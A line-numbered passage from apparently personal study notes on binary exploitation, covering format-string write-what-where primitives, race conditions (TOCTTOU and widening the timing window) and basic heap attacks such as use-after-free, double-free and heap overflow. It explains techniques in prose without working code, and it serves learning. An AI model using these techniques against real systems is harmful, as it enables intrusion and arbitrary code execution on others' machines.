overwrite 698 | the lower order bytes of two further _ahead_ pointing pointers on the 699 | stack, so that they now point to `x+0` and `x+2` where `x` is some 700 | location further _ahead_ on the stack. Using these two overwrites, we 701 | are able to completely control the 4 bytes at `x`, and this becomes 702 | our **where** in the primitive. Now we just have to ignore more 703 | positions on the format string until we come to this point, and we 704 | have a **write-what-where** primitive. 705 | 706 | ### Race Conditions & Exploiting Them 707 | 708 | Written on 1st April 2017 709 | 710 | > Influenced by [this](https://www.youtube.com/watch?v=kqdod-ATGVI) 711 | > amazing live stream by Gynvael Coldwind, where he explains about race 712 | > conditions 713 | 714 | If a memory region (or file or any other resource) is accessed _twice_ 715 | with the assumption that it would remain same, but due to switching of 716 | threads, we are able to change the value, we have a race condition. 717 | 718 | Most common kind is a TOCTTOU (Time-of-check to Time-of-use), where a 719 | variable (or file or any other resource) is first checked for some 720 | value, and if a certain condition for it passes, then it is used. In 721 | this case, we can attack it by continuously "spamming" this check in 722 | one thread, and in another thread, continuously "flipping" it so that 723 | due to randomness, we might be able to get a flip in the middle of the 724 | "window-of-opportunity" which is the (short) timeframe between the 725 | check and the use. 726 | 727 | Usually the window-of-opportunity might be very small. We can use 728 | multiple tricks in order to increase this window of opportunity by a 729 | factor of 3x or even up to ~100x. We do this by controlling how the 730 | value is being cached, or paged. If a value (let's say a `long int`) 731 | is not aligned to a cache line, then 2 cache lines might need to be 732 | accessed and this causes a delay for the same instruction to 733 | execute. Alternatively, breaking alignment on a page, (i.e., placing 734 | it across a page boundary) can cause a much larger time to 735 | access. This might give us higher chance of the race condition being 736 | triggered. 737 | 738 | Smarter ways exist to improve this race condition situation (such as 739 | clearing TLB etc, but these might not even be necessary sometimes). 740 | 741 | Race conditions can be used, in (possibly) their extreme case, to get 742 | ring0 code execution (which is "higher than root", since it is kernel 743 | mode execution). 744 | 745 | It is possible to find race conditions "automatically" by building 746 | tools/plugins on top of architecture emulators. For further details, 747 | http://vexillium.org/pub/005.html 748 | 749 | ### Types of "basic" heap exploits 750 | 751 | Written on 31st Mar 2017 752 | 753 | > Influenced by [this](https://www.youtube.com/watch?v=OwQk9Ti4mg4jjj) 754 | > amazing live stream by Gynvael Coldwind, where he is experimenting 755 | > on the heap 756 | 757 | Use-after-free: 758 | 759 | Let us say we have a bunch of pointers to a place in heap, and it is 760 | freed without making sure that all of those pointers are updated. This 761 | would leave a few dangling pointers into free'd space. This is 762 | exploitable by usually making another allocation of different type 763 | into the same region, such that you control different areas, and then 764 | you can abuse this to gain (possibly) arbitrary code execution. 765 | 766 | Double-free: 767 | 768 | Free up a memory region, and the free it again. If you can do this, 769 | you can take control by controlling the internal structures used by 770 | malloc. This _can_ get complicated, compared to use-after-free, so 771 | preferably use that one if possible. 772 | 773 | Classic buffer overflow on the heap (heap-overflow): 774 | 775 | If you can write beyond the allocated memory, then you can start to 776 | write into the malloc's internal structures of the next malloc'd 777 | block, and by controlling what internal values get overwritten, you 778 | can usually gain a read-what-where primitive, that can usually be 779 | abused to gain higher levels of access (usually arbitrary code 780 | execution, via the `GOT PLT`, or `__fini_array__` or similar). 781 | --------------------------------------------------------------------------------